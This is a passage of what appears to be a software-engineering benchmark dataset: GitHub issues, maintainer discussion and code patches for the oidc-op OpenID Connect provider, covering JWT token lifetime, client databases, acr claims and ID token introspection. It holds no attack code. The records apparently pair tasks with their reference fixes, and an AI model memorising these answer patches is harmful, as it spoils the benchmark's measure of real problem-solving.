def _get_client_claims(self, client_id, usage):
client_info = self.server_get("endpoint_context").cdb.get(client_id, {})
- client_claims = client_info.get("{}_claims".format(usage), {})
+ client_claims = (
+ client_info.get("add_claims", {})
+ .get("always", {})
+ .get(usage, {})
+ )
if isinstance(client_claims, list):
client_claims = {k: None for k in client_claims}
return client_claims
@@ -94,8 +99,19 @@ def get_claims(self, session_id: str, scopes: str, claims_release_point: str) ->
claims.update(base_claims)
- # Scopes can in some cases equate to set of claims, is that used here ?
- if module.kwargs.get("add_claims_by_scope"):
+ # If specific client configuration exists overwrite add_claims_by_scope
+ if client_id in _context.cdb:
+ add_claims_by_scope = (
+ _context.cdb[client_id].get("add_claims", {})
+ .get("by_scope", {})
+ .get(claims_release_point, {})
+ )
+ if isinstance(add_claims_by_scope, dict) and not add_claims_by_scope:
+ add_claims_by_scope = module.kwargs.get("add_claims_by_scope")
+ else:
+ add_claims_by_scope = module.kwargs.get("add_claims_by_scope")
+
+ if add_claims_by_scope:
if scopes:
_scopes = _context.scopes_handler.filter_scopes(client_id, _context, scopes)
@@ -127,9 +143,14 @@ def get_user_claims(self, user_id: str, claims_restriction: dict) -> dict:
:param claims_restriction: Specifies the upper limit of which claims can be returned
:return:
"""
+ meth = self.server_get("endpoint_context").userinfo
+ if not meth:
+ raise ImproperlyConfigured(
+ "userinfo MUST be defined in the configuration"
+ )
if claims_restriction:
# Get all possible claims
- user_info = self.server_get("endpoint_context").userinfo(user_id, client_id=None)
+ user_info = meth(user_id, client_id=None)
# Filter out the claims that can be returned
return {
k: user_info.get(k)
diff --git a/src/oidcop/session/grant.py b/src/oidcop/session/grant.py
index 29a83dd7..25b66692 100644
--- a/src/oidcop/session/grant.py
+++ b/src/oidcop/session/grant.py
@@ -316,7 +316,9 @@ def mint_token(
scope=scope,
extra_payload=handler_args,
)
- item.value = token_handler(session_id=session_id, **token_payload)
+ item.value = token_handler(
+ session_id=session_id, usage_rules=usage_rules, **token_payload
+ )
else:
raise ValueError("Can not mint that kind of token")
diff --git a/src/oidcop/session/manager.py b/src/oidcop/session/manager.py
index b8129904..12875293 100644
--- a/src/oidcop/session/manager.py
+++ b/src/oidcop/session/manager.py
@@ -12,6 +12,7 @@
from oidcop.exception import ConfigurationError
from oidcop.token import handler
from oidcop.util import Crypt
+from oidcop.session.database import NoSuchClientSession
from .database import Database
from .grant import Grant
from .grant import SessionToken
@@ -226,9 +227,11 @@ def create_session(
if not client_id:
client_id = auth_req["client_id"]
- client_info = ClientSessionInfo(client_id=client_id)
-
- self.set([user_id, client_id], client_info)
+ try:
+ self.get([user_id, client_id])
+ except (NoSuchClientSession, ValueError):
+ client_info = ClientSessionInfo(client_id=client_id)
+ self.set([user_id, client_id], client_info)
return self.create_grant(
auth_req=auth_req,
diff --git a/src/oidcop/token/id_token.py b/src/oidcop/token/id_token.py
index 6d08ed0d..5f8bc1f4 100755
--- a/src/oidcop/token/id_token.py
+++ b/src/oidcop/token/id_token.py
@@ -12,9 +12,10 @@
from oidcop.session.claims import claims_match
from oidcop.token import is_expired
from oidcop.token.exception import InvalidToken
+
+from ..util import get_logout_id
from . import Token
from . import UnknownToken
-from ..util import get_logout_id
logger = logging.getLogger(__name__)
@@ -131,9 +132,16 @@ def __init__(
self.provider_info = construct_endpoint_info(self.default_capabilities, **kwargs)
def payload(
- self, session_id, alg="RS256", code=None, access_token=None, extra_claims=None,
+ self,
+ session_id,
+ alg="RS256",
+ code=None,
+ access_token=None,
+ extra_claims=None,
+ user_info=None,
):
"""
+ Collect payload for the ID Token.
:param session_id: Session identifier
:param alg: Which signing algorithm to use for the IdToken
@@ -154,16 +162,18 @@ def payload(
if _val:
_args[attr] = _val
- _claims_restriction = grant.claims.get("id_token")
- if _claims_restriction == {}:
- user_info = None
- else:
- user_info = _context.claims_interface.get_user_claims(
- user_id=session_information["user_id"], claims_restriction=_claims_restriction,
- )
- if _claims_restriction and "acr" in _claims_restriction and "acr" in _args:
- if claims_match(_args["acr"], _claims_restriction["acr"]) is False:
- raise ValueError("Could not match expected 'acr'")
+ if not user_info:
+ _claims_restriction = grant.claims.get("id_token")
+ if _claims_restriction == {}:
+ user_info = None
+ else:
+ user_info = _context.claims_interface.get_user_claims(
+ user_id=session_information["user_id"],
+ claims_restriction=_claims_restriction,
+ )
+ if _claims_restriction and "acr" in _claims_restriction and "acr" in _args:
+ if claims_match(_args["acr"], _claims_restriction["acr"]) is False:
+ raise ValueError("Could not match expected 'acr'")
if user_info:
try:
@@ -197,18 +207,21 @@ def payload(
except KeyError:
pass
+ logger.debug(f"Constructed ID Token payload: {_args}")
+
return _args
def sign_encrypt(
- self,
- session_id,
- client_id,
- code=None,
- access_token=None,
- sign=True,
- encrypt=False,
- lifetime=None,
- extra_claims=None,
+ self,
+ session_id,
+ client_id,
+ code=None,
+ access_token=None,
+ sign=True,
+ encrypt=False,
+ lifetime=None,
+ extra_claims=None,
+ user_info=None,
) -> str:
"""
Signed and or encrypt a IDToken
@@ -237,6 +250,7 @@ def sign_encrypt(
code=code,
access_token=access_token,
extra_claims=extra_claims,
+ user_info=user_info,
)
if lifetime is None:
@@ -246,7 +260,16 @@ def sign_encrypt(
return _jwt.pack(_payload, recv=client_id)
- def __call__(self, session_id: Optional[str] = "", ttype: Optional[str] = "", **kwargs) -> str:
+ def __call__(
+ self,
+ session_id: Optional[str] = "",
+ ttype: Optional[str] = "",
+ encrypt=False,
+ code=None,
+ access_token=None,
+ usage_rules: Optional[dict] = None,
+ **kwargs,
+ ) -> str:
_context = self.server_get("endpoint_context")
user_id, client_id, grant_id = _context.session_manager.decrypt_session_id(session_id)
@@ -262,11 +285,16 @@ def __call__(self, session_id: Optional[str] = "", ttype: Optional[str] = "", **
lifetime = self.lifetime
- # Weed out stuff that doesn't belong here
- kwargs = {k: v for k, v in kwargs.items() if k in ["encrypt", "code", "access_token"]}
-
id_token = self.sign_encrypt(
- session_id, client_id, sign=True, lifetime=lifetime, extra_claims=xargs, **kwargs
+ session_id,
+ client_id,
+ sign=True,
+ lifetime=lifetime,
+ extra_claims=xargs,
+ encrypt=encrypt,
+ code=code,
+ access_token=access_token,
+ user_info=kwargs,
)
return id_token
@@ -297,6 +325,8 @@ def info(self, token):
except JWSException:
raise UnknownToken()
+ logger.debug(f"Received ID Token payload: {_payload}")
+
if is_expired(_payload["exp"]):
raise ToOld("Token has expired")
# All the token metadata
diff --git a/src/oidcop/token/jwt_token.py b/src/oidcop/token/jwt_token.py
index 1329f64d..d19024c9 100644
--- a/src/oidcop/token/jwt_token.py
+++ b/src/oidcop/token/jwt_token.py
@@ -48,8 +48,13 @@ def load_custom_claims(self, payload: dict = None):
# inherit me and do your things here
return payload
- def __call__(self, session_id: Optional[str] = "", token_class: Optional[str] = "",
- **payload) -> str:
+ def __call__(
+ self,
+ session_id: Optional[str] = "",
+ token_class: Optional[str] = "",
+ usage_rules: Optional[dict] = None,
+ **payload
+ ) -> str:
"""
Return a token.
@@ -70,8 +75,15 @@ def __call__(self, session_id: Optional[str] = "", token_class: Optional[str] =
# payload.update(kwargs)
_context = self.server_get("endpoint_context")
+ if usage_rules and "expires_in" in usage_rules:
+ lifetime = usage_rules.get("expires_in")
+ else:
+ lifetime = self.lifetime
signer = JWT(
- key_jar=_context.keyjar, iss=self.issuer, lifetime=self.lifetime, sign_alg=self.alg,
+ key_jar=_context.keyjar,
+ iss=self.issuer,
+ lifetime=lifetime,
+ sign_alg=self.alg,
)
return signer.pack(payload)
| Fix JWT access token lifetime
The `expires_in` defined in usage rules was not reflected to the access token when it was a JWT
| 2021-09-03T00:02:29 | 0.0 | [] | [] |
|||
IdentityPython/oidc-op | IdentityPython__oidc-op-109 | b3605a0288db249059cb80c4c3eb4a7e4ae45176 | diff --git a/docs/source/contents/conf.rst b/docs/source/contents/conf.rst
index ea23e089..34493edc 100644
--- a/docs/source/contents/conf.rst
+++ b/docs/source/contents/conf.rst
@@ -156,9 +156,35 @@ An example::
backchannel_logout_session_supported: True
check_session_iframe: https://127.0.0.1:5000/check_session_iframe
--------------
+---------
+client_db
+---------
+
+If you're running an OP with static client registration you want to keep the
+registered clients in a database separate from the session database since
+it will change independent of the OP process. In this case you need this.
+If you are on the other hand only allowing dynamic client registration then
+keeping registered clients in the session database makes total sense.
+
+The class you reference in the specification MUST be a subclass of
+oidcmsg.storage.DictType and have some of the methods a dictionary has.
+
+Note also that this class MUST support the dump and load methods as defined
+in :py:class:`oidcmsg.impexp.ImpExp`.
+
+An example::
+
+ client_db: {
+ "class": 'oidcmsg.abfile.AbstractFileSystem',
+ "kwargs": {
+ 'fdir': full_path("afs"),
+ 'value_conv': 'oidcmsg.util.JSON'
+ }
+ }
+
+--------------
cookie_handler
--------------
+--------------
An example::
diff --git a/pyproject.toml b/pyproject.toml
index cff54529..7564b0ee 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -7,7 +7,7 @@ build-backend = "setuptools.build_meta"
[metadata]
name = "oidcop"
-version = "2.0.0"
+version = "2.1.0"
author = "Roland Hedberg"
author_email = "[email protected]"
description = "Python implementation of an OAuth2 AS and an OIDC Provider"
diff --git a/setup.py b/setup.py
index 4ac7ce57..d707fd8a 100644
--- a/setup.py
+++ b/setup.py
@@ -72,7 +72,7 @@ def run_tests(self):
"Programming Language :: Python :: 3.9",
"Topic :: Software Development :: Libraries :: Python Modules"],
install_requires=[
- "oidcmsg==1.3.3-1",
+ "oidcmsg==1.4.0",
"cryptojwt==1.5.2",
"pyyaml",
"jinja2>=2.11.3",
diff --git a/src/oidcop/__init__.py b/src/oidcop/__init__.py
index 83246c0e..9b05f0cf 100644
--- a/src/oidcop/__init__.py
+++ b/src/oidcop/__init__.py
@@ -1,6 +1,6 @@
import secrets
-__version__ = "2.0.1"
+__version__ = "2.1.0"
DEF_SIGN_ALG = {
"id_token": "RS256",
diff --git a/src/oidcop/configure.py b/src/oidcop/configure.py
index edd270c9..042593fa 100755
--- a/src/oidcop/configure.py
+++ b/src/oidcop/configure.py
@@ -192,6 +192,7 @@ class EntityConfiguration(Base):
"base_url": "",
"capabilities": None,
"claims_interface": None,
+ "client_db": None,
"cookie_handler": None,
"endpoint": {},
"httpc_params": {},
diff --git a/src/oidcop/endpoint_context.py b/src/oidcop/endpoint_context.py
index e3c19dbe..9a683f2b 100755
--- a/src/oidcop/endpoint_context.py
+++ b/src/oidcop/endpoint_context.py
@@ -93,7 +93,7 @@ class EndpointContext(OidcContext):
"args": {},
# "authn_broker": AuthnBroker,
# "authz": AuthzHandling,
- "cdb": {},
+ "cdb": "DICT_TYPE",
"conf": {},
# "cookie_handler": None,
"cwd": "",
@@ -129,8 +129,15 @@ def __init__(
OidcContext.__init__(self, conf, keyjar, entity_id=conf.get("issuer", ""))
self.conf = conf
+ _client_db = conf.get("client_db")
+ if _client_db:
+ logger.debug(f"Loading client db using: {_client_db}")
+ self.cdb = importer(_client_db["class"])(**_client_db["kwargs"])
+ else:
+ logger.debug("No special client db, will use memory based dictionary")
+ self.cdb = {}
+
# For my Dev environment
- self.cdb = {}
self.jti_db = {}
self.registration_access_token = {}
# self.session_db = {}
diff --git a/src/oidcop/oidc/userinfo.py b/src/oidcop/oidc/userinfo.py
index 37f40078..1b514c01 100755
--- a/src/oidcop/oidc/userinfo.py
+++ b/src/oidcop/oidc/userinfo.py
@@ -10,6 +10,7 @@
from oidcmsg import oidc
from oidcmsg.message import Message
from oidcmsg.oauth2 import ResponseMessage
+from oidcop.session.claims import claims_match
from oidcop.endpoint import Endpoint
from oidcop.token.exception import UnknownToken
@@ -140,6 +141,8 @@ def process_request(self, request=None, **kwargs):
user_id=_session_info["user_id"], claims_restriction=_claims
)
info["sub"] = _grant.sub
+ if _grant.add_acr_value("userinfo"):
+ info["acr"] = _grant.authentication_event["authn_info"]
else:
info = {
"error": "invalid_request",
diff --git a/src/oidcop/session/grant.py b/src/oidcop/session/grant.py
index b9adb41e..29a83dd7 100644
--- a/src/oidcop/session/grant.py
+++ b/src/oidcop/session/grant.py
@@ -9,6 +9,7 @@
from oidcop.authn_event import AuthnEvent
from oidcop.session import MintingNotAllowed
+from oidcop.session.claims import claims_match
from oidcop.session.token import AccessToken
from oidcop.session.token import AuthorizationCode
from oidcop.session.token import IDToken
@@ -180,6 +181,14 @@ def find_scope(self, based_on):
return self.scope
+ def add_acr_value(self, claims_release_point):
+ _release = self.claims.get(claims_release_point)
+ if _release:
+ _acr_request = _release.get("acr")
+ _used_acr = self.authentication_event.get("authn_info")
+ return claims_match(_used_acr, _acr_request)
+ return False
+
def payload_arguments(
self,
session_id: str,
@@ -221,6 +230,10 @@ def payload_arguments(
user_info = endpoint_context.claims_interface.get_user_claims(user_id, _claims_restriction)
payload.update(user_info)
+ # Should I add the acr value
+ if self.add_acr_value(claims_release_point):
+ payload["acr"] = self.authentication_event["authn_info"]
+
return payload
def mint_token(
diff --git a/src/oidcop/session/manager.py b/src/oidcop/session/manager.py
index fde11af8..b8129904 100644
--- a/src/oidcop/session/manager.py
+++ b/src/oidcop/session/manager.py
@@ -38,7 +38,7 @@ def __init__(self, salt: Optional[str] = "", filename: Optional[str] = ""):
if os.path.isfile(filename):
self.salt = open(filename).read()
elif not os.path.isfile(filename) and os.path.exists(
- filename
+ filename
): # Not a file, Something else
raise ConfigurationError("Salt filename points to something that is not a file")
else:
@@ -73,8 +73,10 @@ class SessionManager(Database):
init_args = ["handler"]
def __init__(
- self, handler: TokenHandler, conf: Optional[dict] = None, sub_func: Optional[dict] = None,
+ self, handler: TokenHandler, conf: Optional[dict] = None,
+ sub_func: Optional[dict] = None,
):
+ super(SessionManager, self).__init__()
self.conf = conf or {}
# these won't change runtime
@@ -125,9 +127,9 @@ def __setattr__(self, key, value):
def _init_db(self):
Database.__init__(
- self,
- key=self.load_key(),
- salt=self.load_salt()
+ self,
+ key=self.load_key(),
+ salt=self.load_salt()
)
def get_user_info(self, uid: str) -> UserSessionInfo:
@@ -153,14 +155,14 @@ def find_token(self, session_id: str, token_value: str) -> Optional[SessionToken
return None # pragma: no cover
def create_grant(
- self,
- authn_event: AuthnEvent,
- auth_req: AuthorizationRequest,
- user_id: str,
- client_id: Optional[str] = "",
- sub_type: Optional[str] = "public",
- token_usage_rules: Optional[dict] = None,
- scopes: Optional[list] = None,
+ self,
+ authn_event: AuthnEvent,
+ auth_req: AuthorizationRequest,
+ user_id: str,
+ client_id: Optional[str] = "",
+ sub_type: Optional[str] = "public",
+ token_usage_rules: Optional[dict] = None,
+ scopes: Optional[list] = None,
) -> str:
"""
@@ -175,14 +177,16 @@ def create_grant(
"""
sector_identifier = auth_req.get("sector_identifier_uri", "")
+ _claims = auth_req.get("claims", {})
+
grant = Grant(
authorization_request=auth_req,
authentication_event=authn_event,
- sub=self.sub_func[sub_type](
- user_id, salt=self.salt, sector_identifier=sector_identifier
- ),
+ sub=self.sub_func[sub_type](user_id, salt=self.salt,
+ sector_identifier=sector_identifier),
usage_rules=token_usage_rules,
scope=scopes,
+ claims=_claims
)
self.set([user_id, client_id, grant.id], grant)
@@ -190,14 +194,14 @@ def create_grant(
return self.encrypted_session_id(user_id, client_id, grant.id)
def create_session(
- self,
- authn_event: AuthnEvent,
- auth_req: AuthorizationRequest,
- user_id: str,
- client_id: Optional[str] = "",
- sub_type: Optional[str] = "public",
- token_usage_rules: Optional[dict] = None,
- scopes: Optional[list] = None,
+ self,
+ authn_event: AuthnEvent,
+ auth_req: AuthorizationRequest,
+ user_id: str,
+ client_id: Optional[str] = "",
+ sub_type: Optional[str] = "public",
+ token_usage_rules: Optional[dict] = None,
+ scopes: Optional[list] = None,
) -> str:
"""
Create part of a user session. The parts added are user- and client
@@ -309,10 +313,10 @@ def revoke_token(self, session_id: str, token_value: str, recursive: bool = Fals
self._revoke_dependent(grant, token)
def get_authentication_events(
- self,
- session_id: Optional[str] = "",
- user_id: Optional[str] = "",
- client_id: Optional[str] = "",
+ self,
+ session_id: Optional[str] = "",
+ user_id: Optional[str] = "",
+ client_id: Optional[str] = "",
) -> List[AuthnEvent]:
"""
Return the authentication events that exists for a user/client combination.
@@ -371,10 +375,10 @@ def revoke_grant(self, session_id: str):
self.set(_path, _info)
def grants(
- self,
- session_id: Optional[str] = "",
- user_id: Optional[str] = "",
- client_id: Optional[str] = "",
+ self,
+ session_id: Optional[str] = "",
+ user_id: Optional[str] = "",
+ client_id: Optional[str] = "",
) -> List[Grant]:
"""
Find all grant connected to a user session
@@ -395,13 +399,13 @@ def grants(
return [self.get([user_id, client_id, gid]) for gid in _csi.subordinate]
def get_session_info(
- self,
- session_id: str,
- user_session_info: bool = False,
- client_session_info: bool = False,
- grant: bool = False,
- authentication_event: bool = False,
- authorization_request: bool = False,
+ self,
+ session_id: str,
+ user_session_info: bool = False,
+ client_session_info: bool = False,
+ grant: bool = False,
+ authentication_event: bool = False,
+ authorization_request: bool = False,
) -> dict:
"""
Returns information connected to a session.
@@ -448,14 +452,21 @@ def get_session_info(
return res
+ def _compatible_sid(self, sid):
+ # To be backward compatible is this an old time sid
+ p = self.unpack_session_key(sid)
+ if len(p) == 3:
+ sid = self.encrypted_session_id(*p)
+ return sid
+
def get_session_info_by_token(
- self,
- token_value: str,
- user_session_info: bool = False,
- client_session_info: bool = False,
- grant: bool = False,
- authentication_event: bool = False,
- authorization_request: bool = False,
+ self,
+ token_value: str,
+ user_session_info: bool = False,
+ client_session_info: bool = False,
+ grant: bool = False,
+ authentication_event: bool = False,
+ authorization_request: bool = False,
) -> dict:
_token_info = self.token_handler.info(token_value)
sid = _token_info.get("sid")
@@ -464,6 +475,9 @@ def get_session_info_by_token(
if not sid:
raise WrongTokenClass
+ # To be backward compatible is this an old time sid
+ sid = self._compatible_sid(sid)
+
return self.get_session_info(
sid,
user_session_info=user_session_info,
@@ -475,7 +489,8 @@ def get_session_info_by_token(
def get_session_id_by_token(self, token_value: str) -> str:
_token_info = self.token_handler.info(token_value)
- return _token_info["sid"]
+ sid = _token_info.get("sid")
+ return self._compatible_sid(sid)
def add_grant(self, user_id: str, client_id: str, **kwargs) -> Grant:
"""
diff --git a/src/oidcop/token/__init__.py b/src/oidcop/token/__init__.py
index b3309afa..a9bcd791 100755
--- a/src/oidcop/token/__init__.py
+++ b/src/oidcop/token/__init__.py
@@ -15,6 +15,13 @@
logger = logging.getLogger(__name__)
+ALT_TOKEN_NAME = {
+ "authorization_code": "A",
+ "access_token": "T",
+ "refresh_token": "R",
+ "id_token": "I"
+}
+
def is_expired(exp, when=0):
if exp < 0:
@@ -28,6 +35,11 @@ def is_expired(exp, when=0):
class Token(object):
def __init__(self, token_class, lifetime=300, **kwargs):
self.token_class = token_class
+ try:
+ self.alt_token_name = ALT_TOKEN_NAME[token_class]
+ except KeyError:
+ self.alt_token_name = ""
+
self.lifetime = lifetime
self.kwargs = kwargs
@@ -70,7 +82,8 @@ def __init__(self, password, token_class="", token_type="Bearer", **kwargs):
self.crypt = Crypt(password)
self.token_type = token_type
- def __call__(self, session_id: Optional[str] = "", token_class: Optional[str] = "", **payload) -> str:
+ def __call__(self, session_id: Optional[str] = "", token_class: Optional[str] = "",
+ **payload) -> str:
"""
Return a token.
@@ -112,9 +125,10 @@ def info(self, token: str) -> dict:
:return: dictionary with info about the token
"""
_res = dict(zip(["_id", "token_class", "sid", "exp"], self.split_token(token)))
- if _res["token_class"] != self.token_class:
+ if _res["token_class"] not in [self.token_class, self.alt_token_name]:
raise WrongTokenClass(_res["token_class"])
else:
+ _res["token_class"] = self.token_class
_res["handler"] = self
return _res
diff --git a/src/oidcop/token/jwt_token.py b/src/oidcop/token/jwt_token.py
index d002e416..1329f64d 100644
--- a/src/oidcop/token/jwt_token.py
+++ b/src/oidcop/token/jwt_token.py
@@ -6,11 +6,12 @@
from oidcop.exception import ToOld
from oidcop.token import Crypt
+from oidcop.token.exception import WrongTokenClass
+
from . import Token
from . import is_expired
from .exception import UnknownToken
-
# TYPE_MAP = {"A": "code", "T": "access_token", "R": "refresh_token"}
@@ -58,10 +59,11 @@ def __call__(self, session_id: Optional[str] = "", token_class: Optional[str] =
:param payload: A dictionary with information that is part of the payload of the JWT.
:return: Signed JSON Web Token
"""
- if not token_class and self.token_class:
- token_class = self.token_class
- else:
- token_class = "authorization_code"
+ if not token_class:
+ if self.token_class:
+ token_class = self.token_class
+ else:
+ token_class = "authorization_code"
payload.update({"sid": session_id, "token_class": token_class})
payload = self.load_custom_claims(payload)
@@ -86,14 +88,22 @@ def get_payload(self, token):
def info(self, token):
"""
- Return type of Token (A=Access code, T=Token, R=Refresh token) and
- the session id.
+ Return token information
:param token: A token
- :return: tuple of token type and session id
+ :return: dictionary with token information
"""
_payload = self.get_payload(token)
+ _class = _payload.get("ttype")
+ if _class is None:
+ _class = _payload.get("token_class")
+
+ if _class not in [self.token_class, self.alt_token_name]:
+ raise WrongTokenClass(_payload["token_class"])
+ else:
+ _payload["token_class"] = self.token_class
+
if is_expired(_payload["exp"]):
raise ToOld("Token has expired")
# All the token metadata
diff --git a/src/oidcop/user_authn/authn_context.py b/src/oidcop/user_authn/authn_context.py
index 661635ae..d49f5c0d 100755
--- a/src/oidcop/user_authn/authn_context.py
+++ b/src/oidcop/user_authn/authn_context.py
@@ -108,6 +108,19 @@ def default(self):
return None
+def _acr_claim(request):
+ _claims = request.get("claims")
+ if _claims:
+ _id_token_claim = _claims.get("id_token")
+ if _id_token_claim:
+ _acr = _id_token_claim.get("acr")
+ if 'value' in _acr:
+ return [_acr["value"]]
+ elif 'values' in _acr:
+ return _acr["values"]
+ return None
+
+
def pick_auth(endpoint_context, areq, pick_all=False):
"""
Pick authentication method
@@ -125,9 +138,8 @@ def pick_auth(endpoint_context, areq, pick_all=False):
acrs = areq["acr_values"]
else:
- try:
- acrs = areq["claims"]["id_token"]["acr"]["values"]
- except KeyError:
+ acrs = _acr_claim(areq)
+ if not acrs:
_ith = verified_claim_name("id_token_hint")
if areq.get(_ith):
_ith = areq[verified_claim_name("id_token_hint")]
| Clear txt sid
Session IDs in the old type tokens was in clear text. Not so in the new ones.
This takes care of the difference.
| 2021-07-04T13:30:03 | 0.0 | [] | [] |
|||
IdentityPython/oidc-op | IdentityPython__oidc-op-81 | e4d59ab90bc953e9cad20f087184c04e21126e72 | diff --git a/src/oidcop/oauth2/introspection.py b/src/oidcop/oauth2/introspection.py
index de32f720..c298c12d 100644
--- a/src/oidcop/oauth2/introspection.py
+++ b/src/oidcop/oauth2/introspection.py
@@ -6,6 +6,7 @@
from oidcop.endpoint import Endpoint
from oidcop.token.exception import UnknownToken
+from oidcop.token.exception import WrongTokenClass
LOGGER = logging.getLogger(__name__)
@@ -94,7 +95,7 @@ def process_request(self, request=None, release: Optional[list] = None, **kwargs
_session_info = _context.session_manager.get_session_info_by_token(
request_token, grant=True
)
- except UnknownToken:
+ except (UnknownToken, WrongTokenClass):
return {"response_args": _resp}
grant = _session_info["grant"]
diff --git a/src/oidcop/session/manager.py b/src/oidcop/session/manager.py
index 4ca89870..fde11af8 100644
--- a/src/oidcop/session/manager.py
+++ b/src/oidcop/session/manager.py
@@ -18,6 +18,7 @@
from .info import ClientSessionInfo
from .info import UserSessionInfo
from ..token import UnknownToken
+from ..token import WrongTokenClass
from ..token.handler import TokenHandler
logger = logging.getLogger(__name__)
@@ -457,8 +458,13 @@ def get_session_info_by_token(
authorization_request: bool = False,
) -> dict:
_token_info = self.token_handler.info(token_value)
- sid = _token_info["sid"]
- session_info = self.get_session_info(
+ sid = _token_info.get("sid")
+ # If the token is an ID Token then the sid will not be in the
+ # _token_info
+ if not sid:
+ raise WrongTokenClass
+
+ return self.get_session_info(
sid,
user_session_info=user_session_info,
client_session_info=client_session_info,
@@ -466,7 +472,6 @@ def get_session_info_by_token(
authentication_event=authentication_event,
authorization_request=authorization_request,
)
- return session_info
def get_session_id_by_token(self, token_value: str) -> str:
_token_info = self.token_handler.info(token_value)
| ID Token introspection
Currently providing an ID Token to the introspection endpoint results in an unhandled exception.
@rohe @peppelinux What are out plans regarding using ID tokens in the introspection endpoint?
IMO we should allow introspection of ID tokens.
| @nsklikas I think that an unhandled exception means a bug 😀
Put a unit test for this if you can, then we'll see what's going on.
I'm quite sure that an IDToken would be handled by token introspection, and more... Every issued token should be handled. Probably you face a bug, let's patch It!
Did you tested on this
https://github.com/IdentityPython/oidc-op/pull/74
?
There is no support for introspection of ID Tokens at the introspection endpoint and there shouldn't be.
But it shouldn't result in an unhandled exception.
If @nsklikas desire this feature in, let's give him a chance
It's quite trivial to get that information from a session Grant
That's something for 2.1.0 if you agree, @nsklikas would you go ahead in the meantime?
It's not that simple.
Remember that introspection is a OAuth2 functionality and not OIDC. And that ID Tokens is an OIDC addition.
Introspection was invented because access tokens where supposed to be non-readable to the user.
ID Tokens are by definition readable by anyone and not supposed to be used as access tokens.
This meant that @nsklikas would have a oidc aware token introspection endpoint?
The Sky Is the limit 😎
Regarding the nature of the endpoint, yes I agree that belongs to oauth2 but @nsklikas how would you deal with this?
Many providers out there support the introspection of ID Tokens. It's true that it's an OAuth2 endpoint and I don't know if we should support it as well.
I guess it would make sense to introspect encrypted ID Tokens (the client may not have the encryption key).
The reason it fails is that `get_session_info_by_token` expects to find the `session_id` in the token, but ID Tokens don't contain the session_id. | 2021-06-01T10:17:27 | 0.0 | [] | [] |
Subsets and Splits